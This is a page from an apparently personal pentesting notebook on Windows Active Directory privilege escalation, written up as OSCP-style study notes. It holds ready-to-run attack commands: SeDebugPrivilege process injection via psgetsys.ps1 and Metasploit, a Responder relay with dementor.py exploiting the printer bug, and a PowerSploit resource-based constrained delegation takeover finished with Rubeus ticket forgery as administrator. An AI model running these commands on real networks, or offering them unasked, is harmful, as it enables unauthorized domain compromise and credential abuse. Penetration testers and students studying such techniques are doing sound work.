burmat / nathan burchfield
  • security and systems administration
  • security / hacking
    • Domain Enumeration + Exploitation
      • Command and Control
      • Credential Access
      • Defense Evasion
      • Discovery
      • Execution
      • Impact
      • Lateral Movement
      • Persistence
      • Privilege Escalation
    • Tools and Services
      • Adobe Experience Manager (AEM)
      • amass
      • ike-scan
      • jq
      • Shodan
      • smbmap
      • tmux
      • tshark
      • Voice Over IP (VoIP)
    • One-Liners and Dirty Scripts
    • MSFvenom Cheetsheet
    • Web Application Hacking
      • Cross-Site Scripting (XXS)
      • SQL Injection (SQLi)
    • OSCP / PWK - Random Tips and Tricks
  • systems administration
    • Active Directory Administration
    • Exchange Administration
    • System Fixes
    • Helper Commands
    • Log Parsing
    • SQL Server Administration
    • Windows Terminal Themes
Powered by GitBook
On this page
  • Process Elevation (via SeDebugPrivilege)
  • Attacking spoolss ("The Printer Bug")
  • GenericWrite to Host + User SPN = PWN
  1. security / hacking
  2. Domain Enumeration + Exploitation

Privilege Escalation

The adversary is trying to gain higher-level permissions. https://attack.mitre.org/tactics/TA0004/

Process Elevation (via SeDebugPrivilege)

If you run whoami /priv and you see SeDebugPrivilege set to Enabled, you can assume you already have SYSTEM. One way of doing it, is using decoder's psgetsys.ps1 script once you have a good idea on a PID to inject:

. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864, 'C:\temp\payload.exe');

You can also gain a MSF session and use the module windows/manage/payload_inject with a PID of your choice.

Attacking spoolss ("The Printer Bug")

From a host with unconstrained delegation, "the printer bug" and dementor.py can be used to cause a TGT relay from the target host to us running responder, so we can generate a TGS for any user on that target host:

## set up a relay with responder:
responder -I tun0 --lm # tun0 = 10.10.15.123

## execute exploit through:
proxychains python dementor.py -u xsvc -p 'S3cur3PW123' -d 'burmat.local' 10.10.15.123 10.10.10.123

GenericWrite to Host + User SPN = PWN

If we have GenericWrite privileges over a host and we are a user that has an SPN, we can write our SID to the msDS-AllowedToActOnBehalfOfOtherIdentity property against the AD object user PowerSploit and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path

## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid;
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))";
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};

## use rubeus to forge tickets as administrator accounts
rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt;

PreviousPersistenceNextTools and Services

Last updated 5 months ago